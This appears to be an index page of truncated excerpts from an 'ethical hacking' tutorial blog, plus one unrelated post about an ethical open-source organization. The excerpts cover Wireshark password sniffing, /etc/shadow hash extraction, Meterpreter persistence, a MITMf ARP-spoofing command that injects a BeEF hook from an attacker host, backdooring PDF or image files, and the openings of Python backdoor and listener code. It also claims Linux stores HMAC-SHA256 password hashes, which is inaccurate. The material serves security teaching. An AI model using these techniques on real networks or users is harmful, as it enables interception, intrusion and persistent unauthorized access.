Wireshark for Ethical Hackers - 4
An Alfa adapter that supports wireless G/N is required. Parameter / Value: Chipset: Realtek RTL8814AU; WiFi Standards: IEEE 802.11ac/a/b/g/n; WiFi Frequency: Dual Band 2.4GHz or 5GHz; Antenna Connector: RP-SMA female x 4
Wireshark for Ethical Hackers - 2
Interface Overview: Start Wireshark in Kali Linux. HTTP Image Extracting: filter: image-jfif; Show packet bytes / Export packet bytes. HTTP Passwords: Target website: http://uploaded.net/login; filter: HTTP; filter: urlencod
Ethical.Hacking.2021.10:PIVOTING AND PRIVILEGE ESCALATION(2)
Extracting Password Hashes on Linux
Linux doesn’t store plaintext passwords. Instead, it stores an HMAC-SHA256 hash of the passwords in the file /etc/shadow. The permissions on the /etc/shadow file indicate that only the owner (root) and the group (shadow) can read the file, and that on
New open source organization founded: ethical governance, human freedom over software freedom
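Follow us if you like this! Coraline Ada Ehmke, creator of the Hippocratic License (an open source license with added ethical clauses) and of the Contributor Covenant, the first and most popular code of conduct for open source projects, has announced the founding of a new non-profit open source organization: the Organization for Ethical Source (OES), in order to
Ethical Hacking - POST EXPLOITATION(2)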
MAINTAINING ACCESS - Methods 1. Using a veil-evasion Rev_http_service Rev_tcp_service Use it instead of a normal backdoor. Or upload and execute from meterpreter. Does not always work. 2. Using persistence module run persistence -h Detectable by antivi
Ethical Hacking - GAINING ACCESS(23)
CLIENT SIDE ATTACK - BeEF Framework Hooking targets using MITMF Tools: MITMF and BeEF Start BeEF and execute the following commands: python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --targets 10.0.0.22 -i eth0 --inject --js-url http://10.0.0.13:3000/hoo
Ethical Hacking - GAINING ACCESS(18)
CLIENT SIDE ATTACKS Backdooring ANY file Combine backdoor with any file - Generic solution. Users are more likely to run a pdf, image or audio file than an executable. Works well with social engineering. To convert the original (pdf, jpg, mp3) file to an
Ethical Hacking - GAINING ACCESS(6)
Server Side Attack Analysing scan results and exploiting target system. Go to the Analysis page and find the target host. Scan result - services: Scan result - Vulnerabilities: Scan result - credentials: Try to log in to the database using
Ethical Hacking - GAINING ACCESS(3)
Server side attacks - code execution. Let's analyze the Zenmap scan result first and search for vulnerabilities in Samba smbd 3.x. We find the following vulnerability and try to use it. https://www.rapid7.com/db/modules/exploit/multi/samba/
Ethical Hacking - NETWORK PENETRATION TESTING(23)
Detecting ARP Poisoning Attacks ARP main security issues: 1. Each ARP request/response is trusted. 2. Clients can accept responses even if they did not send a request. We can use the tool called Xarp (http://www.xarp.net/) to detect this kind of attack.
Ethical Hacking - NETWORK PENETRATION TESTING(21)
MITM - Code Injection Inject javascript or HTML code into pages. Code gets executed on target machine. Use the --inject plugin. Code can be: 1. Stored on a local file --js-file or --html-file 2. Stored online --js-url or --html-url 3. Or you can supply th
Ethical Hacking - NETWORK PENETRATION TESTING(20)
MITM - Capturing Screen Of Target & Injecting a Keylogger ScreenShotter Plugin: ScreenShotter: Uses HTML5 Canvas to render an accurate screenshot of a client's browser --screen Load plugin 'ScreenShotter' --interval SECONDS
Ethical Hacking - NETWORK PENETRATION TESTING(11)
Securing your Network From the Above Attacks. Now that we know how to test the security of all known wireless encryption (WEP/WPA/WPA2), it is relatively easy to secure our networks against these attacks as we know all the weaknesses that can be used by ha
Ethical Hacking - NETWORK PENETRATION TESTING(4)
Targeted packet sniffing airodump-ng --channel [channel] --bssid [bssid] --write [file-name] [interface] Now all the data will be stored in the file name specified after the --write option. We can analyze this data using Wireshark. The only problem is that t
Python Ethical Hacking - VULNERABILITY SCANNER(8)
Implementing Code To Discover XSS in Parameters 1. Watch the URL of the XSS reflected page carefully. 2. Add the test_xss_in_link method in the Scanner class.
#!/usr/bin/env python
import requests
import re
from bs4 import BeautifulSoup
from urllib.p
Python Ethical Hacking - VULNERABILITY SCANNER(7)
VULNERABILITY_SCANNER How to discover a vulnerability in a web application? 1. Go into every possible page. 2. Look for ways to send data to the web application (URL + Forms). 3. Send payloads to discover vulnerabilities. 4. Analyze the response to check o
Python Ethical Hacking - VULNERABILITY SCANNER(5)
EXPLOITATION - XSS VULNS XSS - CROSS SITE SCRIPTING VULNS Allow an attacker to inject javascript code into the page. The code is executed when the page loads. The code is executed on the client machine, not the server. Three main types: 1. Persistent/St
Python Ethical Hacking - VULNERABILITY SCANNER(3)
Polish the Python code by sending requests in a session. Class Scanner:
#!/usr/bin/env python
import requests
import re
from urllib.parse import urljoin

class Scanner:
    def __init__(self, url, ignore_links):
        self.session = requests.Session()
Python Ethical Hacking - VULNERABILITY SCANNER(2)
VULNERABILITY_SCANNER How to discover a vulnerability in a web application? 1. Go into every possible page. 2. Look for ways to send data to web application (URL + Forms). 3. Send payloads to discover vulnerabilities. 4. Analyze the response to check of th
Python Ethical Hacking - WEB PENETRATION TESTING(4)
CRAWLING SPIDER Goal -> Recursively list all links starting from a base URL. 1. Read page HTML. 2. Extract all links. 3. Repeat for each new link that is not already on the list.
#!/usr/bin/env python
import re
import requests
from urllib.parse import url
Python Ethical Hacking - Malware Packaging(3)
Convert Python Programs to OS X Executables https://files.pythonhosted.org/packages/4a/08/6ca123073af4ebc4c5488a5bc8a010ac57aa39ce4d3c8a931ad504de4185/pip-19.3-py2.py3-none-any.whl
Python Ethical Hacking - TROJANS Analysis(4)
Adding Icons to Generated Executables Prepare a proper icon file. https://www.iconfinder.com/ Convert the downloaded png file to an icon file. https://www.easyicon.net/language.en/covert/ Convert the Python program to Windows executable -
Python Ethical Hacking - Persistence(2)
Polish the Python code by adding the become_persistent function.
#!/usr/bin/env python
import json
import socket
import subprocess
import os
import base64
import sys
import shutil

class Backdoor:
    def __init__(self, ip, port):
        self.become_persistent()
Python Ethical Hacking - BACKDOORS(7)
Handling Errors: If the client or server crashes, the connection will be lost. Backdoor crashes if: An incorrect command is sent. The correct command is misused. Listener:
#!/usr/bin/env python
import socket
import json
import base64

class Listener:
Python Ethical Hacking - BACKDOORS(5)
File Download: A file is a series of characters. Therefore to transfer a file we need to: 1. Read the file as a sequence of characters. 2. Send this sequence of characters. 3. Create a new empty file at the destination. 4. Store the transferred sequence